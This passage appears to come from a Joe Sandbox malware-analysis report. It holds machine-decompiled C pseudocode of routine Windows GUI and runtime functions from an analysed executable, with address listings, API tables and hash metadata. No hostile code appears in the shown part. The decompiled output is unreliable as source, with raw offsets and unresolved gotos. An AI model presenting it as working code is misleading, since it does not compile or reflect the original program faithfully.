						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00005000;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t67 = _v8;
				_t97 =  *(_t76 + 0x24);
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E00421CD5(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}





















                  0x00424c5d
                  0x00424c5f
                  0x00424c62
                  0x00424c71
                  0x00424c73
                  0x00424c7b
                  0x00424c7e
                  0x00424c81
                  0x00424c8b
                  0x00424c92
                  0x00424c97
                  0x00424cab
                  0x00424cb1
                  0x00424cb4
                  0x00424cb7
                  0x00424cb9
                  0x00424cc1
                  0x00424cc1
                  0x00424cc6
                  0x00424cd3
                  0x00424cc8
                  0x00424cc8
                  0x00424ccc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00424ccc
                  0x00424cbb
                  0x00424cbb
                  0x00424cbf
                  0x00000000
                  0x00000000
                  0x00424cbf
                  0x00424cd9
                  0x00424c99
                  0x00424c99
                  0x00424c8d
                  0x00424c8d
                  0x00424cdf
                  0x00424ce0
                  0x00424ce1
                  0x00424ce2
                  0x00424ce8
                  0x00424cea
                  0x00424ced
                  0x00424ced
                  0x00424cf7
                  0x00424d01
                  0x00424d01
                  0x00424d07
                  0x00424d0a
                  0x00424d0d
                  0x00424d0f
                  0x00424d0f
                  0x00424d30
                  0x00424d3e
                  0x00424d3f
                  0x00424d45
                  0x00424d46
                  0x00424d4e
                  0x00424d4f
                  0x00424d52
                  0x00424d55
                  0x00424d5a

                  APIs
                  • GetStockObject.GDI32(00000000), ref: 00424C65
                    • Part of subcall function 00421B6B: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00421BB3
                    • Part of subcall function 00421B6B: CreatePatternBrush.GDI32(00000000), ref: 00421BC0
                    • Part of subcall function 00421B6B: DeleteObject.GDI32(00000000), ref: 00421BCC
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00424D01
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                  • String ID:
                  • API String ID: 3923860780-0
                  • Opcode ID: af61000ef48e1c6df06a44ee16b59bc6ba0a0ecf5b2466b17b0e7beb40c98814
                  • Instruction ID: c31f29e0610201e6aadbcfe8af86ab14c293c7618f31593165d0ab73f11540cb
                  • Opcode Fuzzy Hash: af61000ef48e1c6df06a44ee16b59bc6ba0a0ecf5b2466b17b0e7beb40c98814
                  • Instruction Fuzzy Hash: 00415971E01628DFCF11CFA9D984AAE7BB4EF48310F510166ED10AB296D3789E41DF94
                  Uniqueness

                  Uniqueness Score: 16.53%

                  Function 004134AC, Relevance: 6.1, APIs: 4, Instructions: 104windowUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E004134AC(void* __ebx, signed int __ecx, int __edi, void* __esi, void* __eflags) {
				signed int _t44;
				WCHAR* _t54;
				WCHAR* _t60;
				void* _t65;
				signed int _t72;
				short* _t81;
				signed int _t84;
				signed int _t91;
				void* _t93;

				_t89 = __edi;
				_push(8);
				E0042922B(E00438CC7, __ebx, __edi, __esi);
				_t91 = __ecx;
				 *(_t93 - 0x14) = 0;
				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
					_t72 =  *(__ecx + 0x74);
					__eflags =  *(_t72 + 0x34) & 0x00080000;
					if(( *(_t72 + 0x34) & 0x00080000) == 0) {
						L14:
						_t44 =  *(_t91 + 0x318);
						__eflags = _t44;
						if(_t44 == 0) {
							__eflags =  *(_t72 + 0x3a);
							if(__eflags == 0) {
								goto L16;
							} else {
								_t91 = _t72;
								goto L20;
							}
						} else {
							__eflags =  *(_t44 + 0x3a);
							if(__eflags != 0) {
								_t91 = _t44;
								L20:
								_push( *((intOrPtr*)(_t91 + 0x1c)) + ( *(_t91 + 0x3a) & 0x0000ffff) * 2);
							} else {
								L16:
								_push(0x43de78);
							}
						}
						E00410F00(0,  *((intOrPtr*)(_t93 + 8)), _t89, _t91, __eflags);
					} else {
						__eflags =  *(__ecx + 0x20);
						if(__eflags == 0) {
							goto L14;
						} else {
							E00404820(_t93 - 0x10);
							_t89 = 0x104;
							 *((intOrPtr*)(_t93 - 4)) = 3;
							 *(_t93 - 0x14) = E00405860(_t93 - 0x10, __eflags, 0x104);
							_t54 = SendMessageW( *(E0040E20E(0, _t93 - 0x10, GetParent( *(_t91 + 0x20))) + 0x20), 0x464, 0x104,  *(_t93 - 0x14));
							_t92 = _t54;
							E0040E100(0, _t93 - 0x10, 0x104, 0xffffffff);
							__eflags = _t54;
							if(__eflags < 0) {
								goto L9;
							} else {
								goto L5;
							}
							L23:
						}
					}
				} else {
					E00404820(_t93 - 0x10);
					 *((intOrPtr*)(_t93 - 4)) = 0;
					_t84 = _t91;
					_push(_t93 - 0x14);
					_t96 =  *(_t91 + 0x20);
					if( *(_t91 + 0x20) == 0) {
						_t65 = E004131FC(0, _t84, __edi, _t91, __eflags);
						 *((char*)(_t93 - 4)) = 2;
					} else {
						_t65 = E004133B9(0, _t84, __edi, _t91, _t96);
						 *((char*)(_t93 - 4)) = 1;
					}
					E00405630(_t93 - 0x10, _t96, _t65);
					 *((char*)(_t93 - 4)) = 0;
					E004055F0( *(_t93 - 0x14) + 0xfffffff0);
					E0040E100(0, _t93 - 0x10, _t89, 0xffffffff);
					L5:
					_t92 =  *(_t93 - 0x10);
					_t60 = PathFindExtensionW(_t92);
					if(_t60 == 0 ||  *_t60 != 0x2e) {
						L9:
						E004057B0(0, _t93 - 0x10, _t89, _t92, __eflags);
						E00405590( *((intOrPtr*)(_t93 + 8)), __eflags, _t93 - 0x10);
						_t81 =  &(( *(_t93 - 0x10))[0xfffffffffffffff8]);
					} else {
						_push( &(_t60[1]));
						E00410F00(0,  *((intOrPtr*)(_t93 + 8)), _t89, _t92,  &(_t60[1]));
						_t81 = _t92 - 0x10;
					}
					E004055F0(_t81);
				}
				return E00429303( *((intOrPtr*)(_t93 + 8)));
				goto L23;
			}












                  0x004134ac
                  0x004134ac
                  0x004134b3
                  0x004134b8
                  0x004134bc
                  0x004134c3
                  0x0041355d
                  0x00413560
                  0x00413567
                  0x004135c4
                  0x004135c4
                  0x004135ca
                  0x004135cc
                  0x004135df
                  0x004135e3
                  0x00000000
                  0x004135e5
                  0x004135e5
                  0x00000000
                  0x004135e5
                  0x004135ce
                  0x004135ce
                  0x004135d2
                  0x004135db
                  0x004135e7
                  0x004135f1
                  0x004135d4
                  0x004135d4
                  0x004135d4
                  0x004135d4
                  0x004135d2
                  0x004135f5
                  0x00413569
                  0x00413569
                  0x0041356c
                  0x00000000
                  0x0041356e
                  0x00413571
                  0x00413576
                  0x0041357f
                  0x0041358e
                  0x004135a9
                  0x004135b4
                  0x004135b6
                  0x004135bb
                  0x004135bd
                  0x00000000
                  0x004135bf
                  0x00000000
                  0x004135bf
                  0x00000000
                  0x004135bd
                  0x0041356c
                  0x004134c9
                  0x004134cc
                  0x004134d4
                  0x004134d7
                  0x004134d9
                  0x004134da
                  0x004134dd
                  0x004134ea
                  0x004134ef
                  0x004134df
                  0x004134df
                  0x004134e4
                  0x004134e4
                  0x004134f7
                  0x00413502
                  0x00413505
                  0x0041350f
                  0x00413514
                  0x00413514
                  0x00413518
                  0x00413520
                  0x00413541
                  0x00413544
                  0x00413550
                  0x00413558
                  0x00413528
                  0x0041352e
                  0x0041352f
                  0x00413534
                  0x00413534
                  0x00413537
                  0x00413537
                  0x00413602
                  0x00000000

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004134B3
                  • PathFindExtensionW.SHLWAPI(?), ref: 00413518
                  • GetParent.USER32(?), ref: 00413591
                  • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 004135A9
                    • Part of subcall function 004133B9: __EH_prolog3.LIBCMT ref: 004133C0
                    • Part of subcall function 004133B9: CoTaskMemFree.OLE32(00000000), ref: 00413404
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: H_prolog3$ExtensionFindFreeMessageParentPathSendTask
                  • String ID:
                  • API String ID: 3379981378-0
                  • Opcode ID: 9b93f53f14f25e835fc708482236e89f8439d2e25500a765c0606f8c38f8f421
                  • Instruction ID: e9548ffd1dfc07055ed96a7418aa3e12d6266e14c49f839bbf957048701678d7
                  • Opcode Fuzzy Hash: 9b93f53f14f25e835fc708482236e89f8439d2e25500a765c0606f8c38f8f421
                  • Instruction Fuzzy Hash: AB41CE71900215EBCB24EFA5C8859EFB7B5BF04708F50092EF112672D1DB38AA85CB59
                  Uniqueness

                  Uniqueness Score: 37.75%

                  Function 00433731, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00433731(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E004284D3( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00433862( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00429429(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                  0x0043373b
                  0x00433742
                  0x00433759
                  0x00000000
                  0x00433749
                  0x0043374b
                  0x00433765
                  0x0043376a
                  0x0043376d
                  0x00433770
                  0x00433799
                  0x004337a0
                  0x004337a2
                  0x00433823
                  0x0043383e
                  0x00433840
                  0x00433780
                  0x00433780
                  0x00433783
                  0x00433785
                  0x00433788
                  0x00433788
                  0x00433788
                  0x00433788
                  0x00000000
                  0x0043378e
                  0x00433802
                  0x00433802
                  0x00433807
                  0x0043380d
                  0x00433810
                  0x00433812
                  0x00433815
                  0x00433815
                  0x00433815
                  0x00433815
                  0x00000000
                  0x00433819
                  0x004337a4
                  0x004337a7
                  0x004337ad
                  0x004337b0
                  0x004337d7
                  0x004337da
                  0x004337e0
                  0x00000000
                  0x00000000
                  0x004337e2
                  0x004337e5
                  0x00000000
                  0x00000000
                  0x004337e7
                  0x004337e7
                  0x004337ed
                  0x004337f0
                  0x0043375e
                  0x0043375e
                  0x004337f9
                  0x00000000
                  0x004337f9
                  0x004337b2
                  0x004337b5
                  0x00000000
                  0x00000000
                  0x004337b9
                  0x004337ca
                  0x004337d0
                  0x004337d2
                  0x004337d5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004337d5
                  0x00433772
                  0x00433775
                  0x00433777
                  0x0043377d
                  0x0043377d
                  0x00000000
                  0x0043374d
                  0x0043374d
                  0x00433752
                  0x00433756
                  0x00433756
                  0x00000000
                  0x00433752
                  0x0043374b

                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00433765
                  • __isleadbyte_l.LIBCMT ref: 00433799
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0042897C,?,00000000,00000000,?,?,?,?,0042897C,00000000,?), ref: 004337CA
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0042897C,00000001,00000000,00000000,?,?,?,?,0042897C,00000000,?), ref: 00433838
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: 74406c40e01131864d5d4bcba5a5eff69e05688d71a6245307a39176d35a87f4
                  • Instruction ID: 94c1967e72314dfb6f68f9f79a209869cb912ef53028721ba2a795084eb0ff20
                  • Opcode Fuzzy Hash: 74406c40e01131864d5d4bcba5a5eff69e05688d71a6245307a39176d35a87f4
                  • Instruction Fuzzy Hash: CF31F2B0A00246EFDF14DF64C8859BB3BA1BF09312F1495AAF4618B291D334DE40DB59
                  Uniqueness

                  Uniqueness Score: 0.05%

                  Function 00417D6B, Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E00417D6B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				struct HWND__* _t33;
				char* _t34;
				struct HWND__* _t55;
				struct HWND__** _t64;
				void* _t65;
				struct HWND__** _t69;
				intOrPtr _t71;

				_push(0x20c);
				E00429294(E00438EDF, __ebx, __edi, __esi);
				_t64 =  *(_t65 + 0xc);
				_t30 =  *((intOrPtr*)(_t65 + 0x10));
				_t69 = _t64;
				_t52 = 0 | _t69 == 0x00000000;
				 *((intOrPtr*)(_t65 - 0x218)) = _t30;
				if(_t69 == 0) {
					L1:
					_t30 = E00413DD0(_t52);
				}
				_t71 = _t30;
				_t52 = 0 | _t71 != 0x00000000;
				if(_t71 != 0) {
					goto L1;
				}
				E00404820(_t65 - 0x214);
				_t55 = _t64[2];
				_t33 = _t64[1];
				 *((intOrPtr*)(_t65 - 4)) = 0;
				if(_t55 != 0xfffffdf8 || (_t64[0x19] & 0x00000001) == 0) {
					if(_t55 == 0xfffffdee && (_t64[0x2d] & 0x00000001) != 0) {
						goto L7;
					}
				} else {
					L7:
					_t33 = GetDlgCtrlID(_t33);
				}
				if(_t33 == 0) {
					L12:
					_t34 =  &(_t64[4]);
					if(_t64[2] != 0xfffffdf8) {
						E0041594E(_t34, 0x50,  *(_t65 - 0x214), 0xffffffff);
					} else {
						WideCharToMultiByte(3, 0,  *(_t65 - 0x214), 0xffffffff, _t34, 0x50, 0, 0);
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t65 - 0x218)))) = 0;
					SetWindowPos( *_t64, 0, 0, 0, 0, 0, 0x213);
					E004055F0( &(( *(_t65 - 0x214))[0xfffffffffffffff8]));
				} else {
					if(E004152FF(0xfffffdf8, _t65 - 0x210, 0, _t64, _t33, _t65 - 0x210, 0x100) != 0) {
						E00415372(0xfffffdf8, 0, _t65 - 0x214, _t65 - 0x210, 1, 0xa);
						goto L12;
					} else {
						E004055F0( &(( *(_t65 - 0x214))[0xfffffffffffffff8]));
					}
				}
				return E00429317(0xfffffdf8, 0, _t64);
			}











                  0x00417d6b
                  0x00417d75
                  0x00417d7a
                  0x00417d7d
                  0x00417d84
                  0x00417d86
                  0x00417d89
                  0x00417d91
                  0x00417d93
                  0x00417d93
                  0x00417d93
                  0x00417d9a
                  0x00417d9c
                  0x00417da3
                  0x00000000
                  0x00000000
                  0x00417dab
                  0x00417db0
                  0x00417db3
                  0x00417dbb
                  0x00417dc0
                  0x00417dce
                  0x00000000
                  0x00000000
                  0x00417dd9
                  0x00417dd9
                  0x00417dda
                  0x00417dda
                  0x00417de2
                  0x00417e23
                  0x00417e23
                  0x00417e29
                  0x00417e4e
                  0x00417e2b
                  0x00417e3b
                  0x00417e3b
                  0x00417e66
                  0x00417e6a
                  0x00417e79
                  0x00417de4
                  0x00417df8
                  0x00417e1e
                  0x00000000
                  0x00417dfa
                  0x00417e03
                  0x00417e08
                  0x00417df8
                  0x00417e86

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00417D75
                  • GetDlgCtrlID.USER32(?), ref: 00417DDA
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000050,00000000,00000000,0000020C), ref: 00417E3B
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00417E6A
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ByteCharCtrlException@8H_prolog3_MultiThrowWideWindow
                  • String ID:
                  • API String ID: 2836953783-0
                  • Opcode ID: 61fcc3095c7373b74f420a1abb7586d02774f24e348145ed8ab378800d5f7111
                  • Instruction ID: 577e202f51eb493e17409dd941570777497b560100243f005a7691c43b21384c
                  • Opcode Fuzzy Hash: 61fcc3095c7373b74f420a1abb7586d02774f24e348145ed8ab378800d5f7111
                  • Instruction Fuzzy Hash: B4310830A44709ABCB20AB24DC89FEF73B5AF50310F10069EF526A62D1DB749DC0CB19
                  Uniqueness

                  Uniqueness Score: 2.71%

                  Function 00421388, Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00421388(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E00420870(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E0042083D(_t51, _t65, 0, _t77) + 4));
					_t70 = E0041F05B(0x44fa10);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E0042B47A(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E00428397(_t51, _t66, _t70, _t83);
								}
								_t37 = E004282CD(_t51, _t64, _t66,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E004282CD(_t51, _t64, _t66, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E0042B47A(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E0041D6AB();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}





















                  0x00421388
                  0x00421388
                  0x00421394
                  0x00421396
                  0x0042139d
                  0x00421475
                  0x00421480
                  0x00421480
                  0x004213a3
                  0x004213a4
                  0x004213a9
                  0x00000000
                  0x00000000
                  0x004213b2
                  0x004213f6
                  0x004213f6
                  0x004213fc
                  0x00421409
                  0x0042140d
                  0x00421474
                  0x00000000
                  0x00421413
                  0x00421413
                  0x00421416
                  0x00421418
                  0x00421429
                  0x00421430
                  0x00421432
                  0x00421435
                  0x00421439
                  0x0042143b
                  0x0042143d
                  0x0042143e
                  0x00421443
                  0x00421446
                  0x00421449
                  0x0042144f
                  0x00421456
                  0x0042145c
                  0x00421461
                  0x00421471
                  0x00421471
                  0x00421461
                  0x00000000
                  0x00421430
                  0x0042141a
                  0x00421427
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421427
                  0x0042140d
                  0x004213b8
                  0x004213ba
                  0x004213c1
                  0x004213c3
                  0x004213c6
                  0x004213c8
                  0x004213cc
                  0x004213cc
                  0x004213c8
                  0x004213c1
                  0x004213d1
                  0x004213d9
                  0x004213e1
                  0x004213e9
                  0x004213f1
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __msize_malloc
                  • String ID:
                  • API String ID: 1288803200-0
                  • Opcode ID: 07fc8dd952d4e8a5f23b7088429bc3348371d158590f4848f08d352337202d60
                  • Instruction ID: 320e6f8a8d1a5bf3ac5580cffa25b4515132b49a173ca4041c9242e5c46b9f15
                  • Opcode Fuzzy Hash: 07fc8dd952d4e8a5f23b7088429bc3348371d158590f4848f08d352337202d60
                  • Instruction Fuzzy Hash: 3E21A2307006309BCB25BF35E881B6B7795AF10354B94866FF85CCA266DB38DC51CAD8
                  Uniqueness

                  Uniqueness Score: 2.71%

                  Function 00419F37, Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E00419F37(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t28;
				void* _t29;
				void* _t30;
				signed int _t35;
				void* _t44;
				signed short* _t58;
				signed int _t60;
				void* _t65;
				void* _t67;
				struct HINSTANCE__* _t68;
				void* _t70;

				_push(__ecx);
				_push(__ecx);
				_push(_t67);
				_v8 = __ecx;
				_t68 =  *(E0042083D(__ebx, __edi, _t67, __eflags) + 0xc);
				_t28 = FindResourceW(_t68, _a4, 0xf1);
				if(_t28 != 0) {
					_t29 = LoadResource(_t68, _t28);
					_v12 = _t29;
					__eflags = _t29;
					if(_t29 == 0) {
						goto L1;
					} else {
						_t70 = LockResource(_t29);
						__eflags = _t70;
						if(__eflags == 0) {
							goto L1;
						} else {
							_t32 =  *(_t70 + 6) & 0x0000ffff;
							_push(__ebx);
							_push(__edi);
							_t60 = 4;
							_t61 = ( *(_t70 + 6) & 0x0000ffff) * _t60 >> 0x20;
							_t65 = E0040B71F(__eflags,  ~(0 | __eflags > 0x00000000) | _t32 * _t60);
							_t35 = 0;
							__eflags = 0 -  *(_t70 + 6);
							if(0 <  *(_t70 + 6)) {
								_t13 = _t70 + 8; // 0x8
								_t58 = _t13;
								do {
									 *(_t65 + _t35 * 4) =  *_t58 & 0x0000ffff;
									_t61 =  *(_t70 + 6) & 0x0000ffff;
									_t35 = _t35 + 1;
									_t58 =  &(_t58[1]);
									__eflags = _t35 - ( *(_t70 + 6) & 0x0000ffff);
								} while (_t35 < ( *(_t70 + 6) & 0x0000ffff));
							}
							_t44 = E00418C83(_v8, _t61, _t65,  *(_t70 + 6) & 0x0000ffff);
							E0040B74E(_t44, _t65, _t70, __eflags, _t65);
							__eflags = _t44;
							if(_t44 != 0) {
								_t55 =  *(_t70 + 4) & 0x0000ffff;
								E0041934C(_v8, ( *(_t70 + 2) & 0x0000ffff) + 7, ( *(_t70 + 4) & 0x0000ffff) + 7,  *(_t70 + 2) & 0x0000ffff, _t55);
								_t44 = E00419400(_v8, __eflags, _a4);
							}
							FreeResource(_v12);
							_t30 = _t44;
						}
					}
				} else {
					L1:
					_t30 = 0;
				}
				return _t30;
			}


















                  0x00419f3c
                  0x00419f3d
                  0x00419f3e
                  0x00419f3f
                  0x00419f47
                  0x00419f53
                  0x00419f5b
                  0x00419f66
                  0x00419f6c
                  0x00419f6f
                  0x00419f71
                  0x00000000
                  0x00419f73
                  0x00419f7a
                  0x00419f7c
                  0x00419f7e
                  0x00000000
                  0x00419f80
                  0x00419f80
                  0x00419f84
                  0x00419f85
                  0x00419f8a
                  0x00419f8b
                  0x00419f9b
                  0x00419f9f
                  0x00419fa1
                  0x00419fa5
                  0x00419fa7
                  0x00419fa7
                  0x00419faa
                  0x00419fad
                  0x00419fb0
                  0x00419fb4
                  0x00419fb6
